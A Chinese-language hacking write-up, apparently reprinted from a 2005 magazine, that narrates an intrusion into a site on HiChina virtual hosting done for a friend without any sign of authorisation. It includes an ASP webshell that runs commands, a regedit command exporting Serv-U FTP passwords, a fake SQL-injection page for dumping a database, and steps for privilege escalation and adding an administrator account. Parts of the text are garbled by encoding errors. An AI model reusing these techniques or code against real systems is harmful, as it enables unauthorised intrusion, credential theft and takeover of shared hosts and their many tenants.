萬網(wǎng):我進來玩過兩次了
文章作者:Andyower 天使娃娃
信息來源:邪惡八進制信息安全團隊(www.)
注:本文已發(fā)表2005年9月的黑客防線.如有轉(zhuǎn)載,請注名
近日,朋友說要我?guī)退粋€站點,說那個站點有許多他想要的資料,他給出了站點www.***d.com,由于一些原因,所以本文有很多的截圖都不能提供,希望大家可以諒解.
第一次滲透
先從主站入手,登陸上去看看,主站上面幾乎都是靜態(tài)的,只有一些新聞,而那些新聞是的注入點是連接到另外的一個IP,220.194.*.*/news.asp?id=111,試一下提交and 1=1,and 1=2,還有"news.asp?id=1‘11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11--1",全部返回正常,也就是說"‘",";","--"," ",已經(jīng)全部被過濾了,再去220.194.*.*去溜達一下,看見一個論壇,動網(wǎng)的,是前幾天剛剛裝上去的,注冊人數(shù)不到50人,為了避免對方是騙人,把建站的日期修改,還是把最新的漏洞測試一下,都不能成功,想跨站?管理員就沒有上過論壇.
這個時候,對www.***y.com掃描的報告出來了,開放21,80,3389,試著ftp上去看看.返回了信息如下:
C:\Documents and Settings\Andyower>ftp www.***d.com
Connected to www..
220-Microsoft FTP for WinSock ready...
220 (歡迎您使用中國萬網(wǎng)虛擬主機服務(wù)��,本空間禁止使用聊天室�,江湖游戲,在線視頻播
放��,專業(yè)下載等嚴重耗用服務(wù)器資源的程序,謝謝您的合作!)
User (www.:(none)):
顯示的是"Microsoft FTP for WinSock ready",小樣的,"serv-u‘,你以為你換了馬甲我就不認識你啊,原因是因為出現(xiàn)了"220",一般來說,返回的信息有"220"的,就多半都是"serv-u"了.是萬網(wǎng)的虛擬主機,聽說萬網(wǎng)的虛擬機被人搞過很多次了,不知道現(xiàn)在有沒有學乖點呢.先不管這個���,既然是虛擬主機,就幾乎可以肯定的,一定可以旁注.
打開Domain3.5,設(shè)置好參數(shù),過了沒多久出來結(jié)果,上面捆綁了非常多的網(wǎng)站,看得我都不想看了,純粹屬于體力活,還好有天使娃娃在,這種事情就交給她吧.讓她隨便找到一個存在漏洞的網(wǎng)站,得到個webshell再說.(天使娃娃:為什么受傷的總是我......)
不知道是因為天使娃娃的命好還是人品好,才不到10分鐘,就拿下了一個年老失修的動網(wǎng),并且把一句話木馬寫好了,就等著我去連接了.我比較喜歡海陽頂端木馬,配合起一句話非常的好用��。連接上去以后,看見了許多的站點.如圖1:
隨便點擊一個進去看看,發(fā)現(xiàn)沒有權(quán)限,也許是為每個用戶都提供了一個賬號吧.再看看其他的東西,發(fā)現(xiàn)不能執(zhí)行cmd,自己上傳了一個cmd.exe上去,發(fā)現(xiàn)還是不能執(zhí)行.因為現(xiàn)在我用的這個海洋不是最新的版本,所以沒有查看組件的功能,在沒有查看組件前,很多的東西都是不能確定的.這次,上傳了另外一個海洋,查看組件.如圖2:
最重要的2個組件可以用:Shell.Application ,WScript.Shell,也就是說WScript.Shell被改名了,但是還是存在的,這種小事難不到偶滴,馬上弄了段代碼上去,內(nèi)容如下
<%
fpath = request("fpath")
if request("cmd")<>"" then
%>
<div align="center">
<ObjEct runat=sErvEr iD=Andyower scOpE=pagE
classiD="clsiD:72C24DD5-D70A-438B-8A42-98424B88AFB8">
</ObjEct>
<textarea readonly cols=80 rows=20>
<%=Andyower.exec(fpath & " /c "+request("cmd")).stdout.readall%>
</textarea>
提交 cmd.asp?fpath=自己的cmd.exe的路徑&cmd=命令.如圖3
現(xiàn)在已經(jīng)可以運行cmd命令了,在這里我想說一下,在組件探測的時候,探測到WScript.Shell不存在也有可能可以執(zhí)行命令的.在這補充一下,寫完這文章的時候,突然發(fā)現(xiàn),其實海洋就直接提供有這個功能了,只是我一直沒用到.只要在執(zhí)行Wscript.Shell的頁面,點擊使用Wscript.Shell,然后在下面的命令框下寫自己的cmd.exe的路徑寫上去,例:
"f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an",這個效果和我用的效果是一樣的.(在此感謝Lcx大哥提供那么好用的馬兒).
在netstat -an的時候.有一條值得注意‘TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING",和想象中的一樣,既然是這樣子,把早就準備好了的serv-u本地提升權(quán)限的程序弄上去,試了幾個都不能成功,難道說密碼改了?前面我已經(jīng)試過跳轉(zhuǎn)目錄,在"C:\Documents and Settings\All Users\「開始」菜單\程序\"找到了serv-u的目錄,并且下載了快捷方式,得到路徑以后,嘗試跳到serv-u的目錄,已經(jīng)試過了,不能的跳轉(zhuǎn),做了限制.就這樣的放棄了?不能,當然不能了,都做到這一步了,放棄了太可惜了.不知道大家記得不記得6月的黑防,下雨天[F.S.T]寫的那篇文章:"serv_u FTP 再暴本地權(quán)限提升漏洞",也許很多人沒有注意到吧,可能是因為覺得局限性非常的小,但是,我可以告訴你們,成功率高達80%,為什么呢?因為現(xiàn)在的虛擬主機商都怕了serv-u本地權(quán)限提升漏洞,所以,他們很都的管理員都是把密碼存放在注冊表里面,也就是說,符合了下雨天文章所說的要求,賬號和密碼存放在注冊表里面.不記得的讀者們請重新的翻開書來看看吧.我也不想廢話那么多,直接看怎么實現(xiàn)的吧,在webshell那,執(zhí)行命令:regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" ,就會把注冊表的中的serv-u的賬號密碼全部的導出到了C:\Documents and Settings\All Users\Documents\system.ini這個文件里面,當然了前提是:C:\Documents and Settings\All Users\Documents\ 這個文件是可寫的,如果不能寫的話,自己換一個可以寫的目錄吧.然后下載system.ini文件,打開一看!呆了!如圖4:
所有的人的賬號密碼都是明文的,在這里想說一下,因為我們的權(quán)限是Guests的,所以是根本沒有權(quán)限往注冊表里面寫入一個管理員的賬號和密碼,而且為了證明自己的想法,偶也在本機測試過,在Guests下,是沒有任何權(quán)限往注冊表修改或者是添加刪除的.很多的辦法都試過了,還是不行.跳轉(zhuǎn)到c:\winnt\下�,非常多的KB*.log文件,這些都是補丁的日志,最新的一個補丁就是在昨天打的,也許是因為開啟了windows自動更新的功能,我猜想管理員才不會那么的勤快.
現(xiàn)在我們已經(jīng)有了所有用戶的ftp賬號和密碼,關(guān)鍵就是找到ftp賬號密碼所對應(yīng)的網(wǎng)站了,但是他的網(wǎng)站的目錄都是按順序的,從目錄根本沒有辦法猜到哪個目錄對應(yīng)著哪個網(wǎng)站,400多個站點啊!一個個手工的測試的話,會讓人瘋掉的.我現(xiàn)在休息一下.體力活,讓天使娃娃來吧.(天使娃娃:為什么受傷的又是我......)至于在得到所有ftp賬號和密碼的情況下怎么知道哪個ftp對應(yīng)的是哪個網(wǎng)站,我也說說吧,先找出目標網(wǎng)站的特殊一點的網(wǎng)頁名字,然后一個個賬號密碼的登陸,用ls命令來查看,是不是存在那個文件,如果不存在就下一個,如果存在,還要再仔細的查看其他的文件,是不是都符合要求,存在不存在那個站點的其他的文件.暈了吧,沒事,實例說明一切.
先上www.***d.com網(wǎng)站,找?guī)讉€特殊的文件,在這里,我找到的是http://www.***d.com/sqrd.htm,還有http://www.***d.com/yuq.htm.得到文件名,sqrd.htm還有yuq.htm,然后從cn23001這個賬號開始,用得到的賬號和密碼登陸,登陸進去以后���,發(fā)現(xiàn)沒有sqrd.htm文件的就直接跳過去了,如果存在sqrd.htm文件,再看看有沒有yuq.htm文件.如果都存在,說明很大可能就是這個ftp賬號了,對了,還忘記說了一下��,在system.ini文件里面,重要的就是2樣東西.第一個:[HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\\Domains\1\UserSettings\cn23017] ,賬號就是cn23017,第二:密碼就是在下面的"Password"=這里是密碼,一個個的慢慢試吧.我去睡覺了,累死了.
一覺醒來,天使娃娃很郁悶的對我說,還是沒有找到,他都試到了cn23217了,已經(jīng)累得不行了,上網(wǎng)查查有沒有相關(guān)的軟件,查不到,算了,還是我們偉大的領(lǐng)袖毛主席說得好,自己動手豐衣足食.自己寫一個程序來針對性的暴力破解吧.花了點時間把程序?qū)懞?程序界面如下圖5:
界面是難看了一點,因為趕時間嘛,寫個程序花了半個多小時,再美化的話又要花幾個小時了,簡直是浪費時間.能用就可以啦.說名一下,"ftp主機名"不用說了吧.對方的ftp的地址,"特殊文件名"填寫的是要得到的ftp對應(yīng)的網(wǎng)站的特殊文件名,這個已經(jīng)在文章中說名了的."從第幾個ftp賬號開始...",這個地方,按照自己的要求來寫,因為偶在測試的時候,有的時候讀取到100多個,程序就掛了,如果重新開始又太麻煩,所以就加上這個選項,防止程序掛了以后�����,不用重新開始讀取,默認寫1就可以了,意思是從文件中的第一個ftp賬號開始測試,其他的就不用寫啦,就等著賬號出來吧.還有一點����,因為為了節(jié)約時間.我沒有用到多線程,所以就自動跳出對話框來代替了多線程,防止程序死鎖.等下次有時間或者是有人覺得好用,我再完善吧.現(xiàn)在就這樣將就著先吧.下面是我的測試.如圖6:
我是從第4個賬號開始讀取,當?shù)顷懙膄tp下存在index.asp這個文件的時候,就會把賬號和密碼再列出來,方便吧.到了這里也許會有人問,萬一有幾個網(wǎng)站都存在著一樣的特殊文件名呢?呵呵,這個時候,就需要自己動一下手啦,不能那么懶的.
不到幾分鐘,已經(jīng)測試完了,其中的一個賬號存在著我寫的特殊的文件名,就他了.手工ftp進去看看,完全就是這個站點了,小樣的�,www.***d.com,你以為你躲著深我就找不到你了啊!哈哈!一樣讓你跑不掉!ls命令看看.發(fā)現(xiàn)一個conn.asp文件,打開來看看,既然是另外一個主機的連接信息:
<%
dim conn
dim connstr
connstr="provider=sqloledb;driver={SQL SERVER};server=220.194.*.*;uid=j****;pwd=d******;database=d*****;"
set conn=server.createobject("ADODB.CONNECTION")
conn.open connstr
%>
再次滲透
這次萬網(wǎng)害死人了吧!既然讓我得到了要進攻的網(wǎng)站的另外一臺服務(wù)器.220.194.*.*,這臺服務(wù)器是獨立的,旁注過,沒有成功,因為不存在另外的網(wǎng)站,這一次,看你往哪跑,一起把他拿下!因為有些原因,從現(xiàn)在開始不提供截圖了,希望可以諒解.既然已經(jīng)得到了數(shù)據(jù)庫的賬號密碼,而且他的網(wǎng)站是直接用asp連接上去的,這樣說,一定會開了ms sql的端口的.用sql器連接上去,發(fā)現(xiàn)自己的權(quán)限是db_owner的權(quán)限,很多命令不能用�����,自己手工讀去對方的web路徑又太麻煩了,而且我也想看看他的結(jié)構(gòu),既然我有了sql賬號的密碼.他的服務(wù)器上沒有注入漏洞,我可以幫他偽造一個,偽造一個注入點,然后用nbsi來猜解其他的信息,速度會快很多的.
偶馬上就在本地架設(shè)了一個IIS,然后把他的conn.asp文件弄到我的虛擬目錄下.再構(gòu)造一個存在注入點的文件a.asp,里面的admin表是存在的,代碼如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id ‘如果沒有這個表,可以自己建立一個表和字段
rs.open strSQL,conn,1,3
rs.close
%>
完成了,就這么簡單,其他的信息就讓他全部自己暴露出來吧.打開nbsi,一頓狂注,什么信息都出來啦,慢慢的瀏覽著他的目錄,web目錄在d:\wwww,還裝了serv-u,這個服務(wù)器因為是自己的��,所以不會那么專業(yè)吧,應(yīng)該不會設(shè)什么防的.先得到webshell再說,db_owner的權(quán)限可以備份數(shù)據(jù)庫,我用xiaolu的getwebshell.exe,備份數(shù)據(jù)庫文件到d:\www\1.asa,結(jié)果不能運行!出錯!原來該死的數(shù)據(jù)庫中存在<% 這個東西,沒辦法����,運氣一向不是很好,這次又是個很好的理由.慢慢的找到數(shù)據(jù)庫中看哪個字段存在<%的內(nèi)容,刪除!
又花了半個小時找出來了,用SQL語句把他刪除,再備份,這次成功了.成功的拿到webshell,覺得不好看的��,重新寫一個webshell進去吧,接著就是serv-u提升權(quán)限,添加一個賬號,設(shè)置成為管理員,3389登陸進去,爽死了!什么都有了���,把賬號密碼給朋友吧,他愛怎么搞是他的事情了,我的任務(wù)已經(jīng)完成.
注意:由于本文圖片為引用 為了避免圖片失效 上傳含圖pdf附件提供大家下載 歡迎使用adobe 生成PDF文件可以較好的保護您的版權(quán) 您可以同步發(fā)出含圖主題和PDF 不用擔心別人轉(zhuǎn)載文章刪除您的附加信息 因為還有PDF可以說明一切
附件:  ftp.rar (6 K) 下載次數(shù):256
附件: 萬網(wǎng)我進來玩過兩次了.rar (407 K) 下載次數(shù):243
|
